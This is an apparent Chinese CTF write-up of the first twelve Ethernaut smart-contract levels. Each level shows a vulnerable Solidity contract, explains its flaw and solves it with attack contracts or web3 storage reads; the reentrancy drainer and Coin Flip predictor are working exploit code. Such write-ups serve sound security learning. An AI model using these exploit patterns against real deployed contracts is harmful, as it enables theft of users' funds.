ethernaut 以太坊靶场学习 (1-12)

前言

这个靶场搜集了许多不同的 solidity 开发的问题,通过这个可以入门 区块链安全

Fallback

给出了源码

pragma solidity ^0.4.18;

import 'zeppelin-solidity/contracts/ownership/Ownable.sol';

contract Fallback is Ownable {

  mapping(address => uint) public contributions;

  function Fallback() public {
contributions[msg.sender] = 1000 * (1 ether);
} function contribute() public payable {
require(msg.value < 0.001 ether);
contributions[msg.sender] += msg.value;
if(contributions[msg.sender] > contributions[owner]) {
owner = msg.sender;
}
} function getContribution() public view returns (uint) {
return contributions[msg.sender];
} function withdraw() public onlyOwner {
owner.transfer(this.balance);
} function() payable public {
require(msg.value > 0 && contributions[msg.sender] > 0);
owner = msg.sender;
}
}

题目的要求为

  1. 获取合约所有权
  2. 获取所有合约的余额

这个题主要考察 fallback 函数 ,合约可以有一个未命名的函数。这个函数不能有参数也不能有返回值,这个函数叫做 fallback 函数, 在上面的源码中 fallback 函数为

  function() payable public {
// 当msg.value 和 contributions[msg.sender] 都 大于0 测修改 owner
require(msg.value > 0 && contributions[msg.sender] > 0);
owner = msg.sender;
}

fallback 函数被调用的情况有两种

  • 调用合约中不存在的函数

  • 当合约收到以太币(没有任何数据)

此外,为了接收以太币,fallback 函数必须标记为 payable

整个解题过程

  • 调用 contribute 增加 contributions

ethernaut 以太坊靶场学习 (1-12)

  • 往 合约账户 发送 eth ,触发 fallback 函数 ,改变合约的 owner

ethernaut 以太坊靶场学习 (1-12)

  • 调用 withdraw 获取所有合约的余额

ethernaut 以太坊靶场学习 (1-12)

Fallout

pragma solidity ^0.4.18;

import 'zeppelin-solidity/contracts/ownership/Ownable.sol';

contract Fallout is Ownable {

  mapping (address => uint) allocations;

  /* constructor */
function Fal1out() public payable {
owner = msg.sender;
allocations[owner] = msg.value;
} function allocate() public payable {
allocations[msg.sender] += msg.value;
} function sendAllocation(address allocator) public {
require(allocations[allocator] > 0);
allocator.transfer(allocations[allocator]);
} function collectAllocations() public onlyOwner {
msg.sender.transfer(this.balance);
} function allocatorBalance(address allocator) public view returns (uint) {
return allocations[allocator];
}
}

题目的要求是 获取合约所有权

Fal1out 函数名打错,不是构造函数,变成了 public 的函数,任何人可以调用。直接调用这个就可以改变 owner .

这份代码还有另外一个问题, 在 sendAllocation 函数中,把 eth 发给用户后,并没有清空 allocations[allocator] , 使得用户可以不断的让合约账户发 eth 给他

Coin Flip

pragma solidity ^0.4.18;

contract CoinFlip {
uint256 public consecutiveWins;
uint256 lastHash;
uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968; function CoinFlip() public {
consecutiveWins = 0;
} function flip(bool _guess) public returns (bool) { // 通过上一个区块的 hash 做为随机数种子
uint256 blockValue = uint256(block.blockhash(block.number-1)); if (lastHash == blockValue) {
revert();
} lastHash = blockValue;
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false; if (side == _guess) {
consecutiveWins++;
return true;
} else {
consecutiveWins = 0;
return false;
}
}
}

要求 consecutiveWins 的值设置为 10

其实就是要猜中 10 次随机数, 浏览代码发现随机数的种子为上一个区块的 hash。这里有个小细节

ethernaut 以太坊靶场学习 (1-12)

一个交易是被打包在一个区块里的,通过 attack 合约去调用 Lottery 合约,那么他们的区块信息都是一样的。

所以用合约去调用 flip 就可以猜测出 flip 会算出的随机数。

poc 如下

pragma solidity ^0.4.18;

contract CoinFlip {
function flip(bool _guess) public returns (bool);
} contract CoinFlipAttack { address CoinFlipAddress; function CoinFlipAttack() public {
// CoinFlip 合约部署后的地址
CoinFlipAddress = 0x00dc1a74279861073a5ac90af56375ebca88498a48;
} function setCoinFlipAddress(address _address) public {
CoinFlipAddress = _address;
} function attack() public returns (bool){
uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
CoinFlip coinflip = CoinFlip(CoinFlipAddress);
uint256 blockValue = uint256(block.blockhash(block.number-1)); uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;
return coinflip.flip(side); }
}

执行 10 次即可。

Telephone

pragma solidity ^0.4.18;

contract Telephone {

  address public owner;
function Telephone() public {
owner = msg.sender;
} function changeOwner(address _owner) public {
if (tx.origin != msg.sender) {
owner = _owner;
}
}
}

要求成为合约的拥有者

其实就是要绕过

if (tx.origin != msg.sender)

如果我们直接调用题目合约,tx.origin 就与 msg.sender 相同。用另一合约去调用此合约,tx.origin 就不会与 msg.sender 相同。

所以新写一个合约去调用这个合约的 changeOwner 方法即可

pragma solidity ^0.4.18;

contract Telephone {

  address public owner;

  function Telephone() public {
owner = msg.sender;
} function changeOwner(address _owner) public {
if (tx.origin != msg.sender) {
owner = _owner;
}
}
}

Token

pragma solidity ^0.4.18;

contract Token {

  mapping(address => uint) balances;
uint public totalSupply; function Token(uint _initialSupply) public {
balances[msg.sender] = totalSupply = _initialSupply;
} function transfer(address _to, uint _value) public returns (bool) {
require(balances[msg.sender] - _value >= 0);
balances[msg.sender] -= _value;
balances[_to] += _value;
return true;
} function balanceOf(address _owner) public view returns (uint balance) {
return balances[_owner];
}
}

经典的 无符号数滥用, balances 的类型为 uint ,所以

require(balances[msg.sender] - _value >= 0);

始终满足。这样就可以转任意 token 给任何用户。

Delegation

pragma solidity ^0.4.18;

contract Delegate {

  address public owner;

  function Delegate(address _owner) public {
owner = _owner;
} function pwn() public {
owner = msg.sender;
}
} contract Delegation { address public owner;
Delegate delegate; function Delegation(address _delegateAddress) public {
delegate = Delegate(_delegateAddress);
owner = msg.sender;
} function() public {
if(delegate.delegatecall(msg.data)) {
this;
}
}
}

题目的要求是获取 Delegation 合约的所有权。

这题主要考察 delegatecall 的特性。

下面这篇文件总结的比较全

https://paper.seebug.org/633/#0x00

delegatecall 所在合约 (A) 在调用其他合约 (B) 的函数时,所用到的很多状态( 比如 msg.sender )都是 A 合约里面的。以及当 A 和 B 合约有一样的变量时,使用的是 A 合约中的变量。

所以利用方法如下

通过转账触发 Delegation 合约的 fallback 函数,同时设置 datapwn 函数的标识符。

delegate.delegatecall(msg.data)

然后在Delegate 合约里面的 pwn 函数就会修改 Delegation 合约的 owner 变量为我们的合约地址。

ethernaut 以太坊靶场学习 (1-12)

计算函数 id 的方法

web3.sha3("pwn()").slice(0,10)
"0xdd365b8b"

Force

pragma solidity ^0.4.18;

contract Force {/*

                   MEOW ?
/\_/\ /
____/ o o \
/~____ =ø= /
(______)__m_m) */}

要求是让该合约的余额(this.balance ) 不为零。

一般情况下,如果要能往合约发送 eth 需要其 fallback 函数为 payable。不过另一个合约可以通过 selfdestruct 强行给一个合约发送 eth

pragma solidity ^0.4.18;

contract Selfdestruct{
function Selfdestruct() public payable{} // 构造函数为payable,那么就能在部署的时候给此合约转账。
function attack() public {
selfdestruct(0x00df9e19b596e9d8ab0fa7c6edfcc5f9f0654eb88e); // 这里要指定为销毁时将基金发送给的地址。
}
}

Vault

pragma solidity ^0.4.18;
contract Vault {
bool public locked;
bytes32 private password; function Vault(bytes32 _password) public {
locked = true;
password = _password;
} function unlock(bytes32 _password) public {
if (password == _password) {
locked = false;
}
}
}

要求是令 locked = false , 其实就是要我们猜测 password 的值, 这里有个细节不论是 private 变量还是 public 变量都是会存储在区块链上的,就是说依然是公开的。

具体可以看

http://8btc.com/thread-226862-1-1.html

所以直接使用

web3.eth.getStorageAt("0xd22f593d19cc91d53cad61670fb8474624e8e4a7", 1, function(x, y) {alert(web3.toHex(y))})

查看 0xd22f593d19cc91d53cad61670fb8474624e8e4a7 合约的第 2storage 变量的值( password )。

ethernaut 以太坊靶场学习 (1-12)

然后用 remix 把它给解锁。

ethernaut 以太坊靶场学习 (1-12)

King

pragma solidity ^0.4.18;

import 'zeppelin-solidity/contracts/ownership/Ownable.sol';

contract King is Ownable {

  address public king;
uint public prize; function King() public payable {
king = msg.sender;
prize = msg.value;
} function() external payable {
require(msg.value >= prize || msg.sender == owner);
king.transfer(msg.value);
king = msg.sender;
prize = msg.value;
}
}

题目的要求是让我们成为永远的 king.

这里的转账函数为 transfer,根据其函数功能,我们可以令其转账过程中报错,从而返回throws 错误,无法继续执行下面的代码,这样就不会产生新的国王了

另外我们知道,如果向一个没有 fallback 函数的合约,或 fallback 不带 payable 的合约发送 eth,则会报错。

通过

fromWei((await contract.prize()).toNumber())

获取当前国王的价格

所以写个合约去调用它

pragma solidity ^0.4.18;
contract KingAttack {
function KingAttack() public payable {
address victim = 0x00023c2d053a342b80116d1ff0b986f5d821a08d91; // instance address
victim.call.gas(1000000).value(msg.value);
}
}

Re-entrancy

pragma solidity ^0.4.18;

contract Reentrance {

  mapping(address => uint) public balances;

  function donate(address _to) public payable {
balances[_to] += msg.value;
} function balanceOf(address _who) public view returns (uint balance) {
return balances[_who];
} function withdraw(uint _amount) public {
if(balances[msg.sender] >= _amount) {
if(msg.sender.call.value(_amount)()) {
_amount;
}
balances[msg.sender] -= _amount;
}
} function() public payable {}
}

要求是转光合约账户的 eth.

漏洞在 withdraw 提现的时候,使用的是

msg.sender.call.value(_amount)()

把钱转给用户,这个会引起重入漏洞。重入漏洞的原理可以看

http://rickgray.me/2018/05/17/ethereum-smart-contracts-vulnerabilites-review/

所以我们要实现一个合约,在 fallback 函数中再次调用存在漏洞的函数,他就会一直转账,而不会进入下面的更改 用户余额的代码。

 balances[msg.sender] -= _amount;

poc 如下

pragma solidity ^0.4.18;

contract Reentrance {

  mapping(address => uint) public balances;

  function donate(address _to) public payable {
balances[_to] += msg.value;
} function balanceOf(address _who) public view returns (uint balance) {
return balances[_who];
} function withdraw(uint _amount) public {
if(balances[msg.sender] >= _amount) {
if(msg.sender.call.value(_amount)()) {
_amount;
}
balances[msg.sender] -= _amount;
}
} function() public payable {}
} contract MyContract {
Reentrance c;
address owner; function MyContract(address _c) public payable {
c = Reentrance(_c);
owner = msg.sender;
c.donate.value(msg.value)(this);
} function() public payable {
uint weHave = c.balanceOf(this);
if (weHave > c.balance) {
if (c.balance != 0) c.withdraw(c.balance);
return;
}
c.withdraw(weHave);
} function exploit() public {
c.withdraw(1000000000000000000);
} function dtor() public {
selfdestruct(owner);
}
}

记得要在调用 exploit 函数时设置 gas limit 为一个大的值 999999, 否则会执行失败 (out of gas)

ethernaut 以太坊靶场学习 (1-12)

Elevator

pragma solidity ^0.4.18;

interface Building {
function isLastFloor(uint) view public returns (bool);
} contract Elevator {
bool public top;
uint public floor; function goTo(uint _floor) public {
Building building = Building(msg.sender); if (! building.isLastFloor(_floor)) {
floor = _floor;
top = building.isLastFloor(floor);
}
}
}

题目要求: 让 toptrue.

实现一个合约使得 isLastFloor 第一次返回 false 第二次返回 true 即可。

poc:

pragma solidity ^0.4.18;

contract Elevator {
function goTo(uint _floor) public {}
} contract ElevatorAttack {
bool public isLast = true; function isLastFloor(uint) public returns (bool) {
isLast = ! isLast;
return isLast;
} function attack(address _target) public {
Elevator elevator = Elevator(_target);
elevator.goTo(10);
}
}

Privacy

pragma solidity ^0.4.18;

contract Privacy {

  bool public locked = true;
uint256 public constant ID = block.timestamp;
uint8 private flattening = 10;
uint8 private denomination = 255;
uint16 private awkwardness = uint16(now);
bytes32[3] private data; function Privacy(bytes32[3] _data) public {
data = _data;
} function unlock(bytes16 _key) public {
require(_key == bytes16(data[2]));
locked = false;
} /*
A bunch of super advanced solidity algorithms... ,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`
.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,
*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^ ,---/V\
`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*. ~|__(o.o)
^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*' UU UU
*/
}

和之前的某一题类似。就是要明白 solidity 中变量的存储。EVM 虚拟机是一个256位的机器,所以它的一个存储位我们也看到了就是 32 个字节

constant 变量不存储在链上, 下面 4 个变量的大小和小于 32 字节存在一个存储位

bool public locked = true;  // 1 字节
uint8 private flattening = 10; // 1 字节
uint8 private denomination = 255; // 1 字节
uint16 private awkwardness = uint16(now); // 2 字节

所以 data[2]3 偏移的 Storage

web3.eth.getStorageAt("0xb0ca0b0f85590d8659c51d35aaa81132e95b0285", 3, function(x, y) {alert(web3.toHex(y))})

然后 bytes16 其实就是切片,取前 16 个 字节.

具体可以看

https://www.bubbles966.cn/blog/2018/05/07/analyse_dapp_by_ethernaut_2/

参考

https://blog.riskivy.com/%E6%99%BA%E8%83%BD%E5%90%88%E7%BA%A6ctf%EF%BC%9Aethernaut-writeup-part-1/

https://www.anquanke.com/post/id/148341#h2-9
上一篇:struts2源码分析-初始化流程


下一篇:python3之微信文章爬虫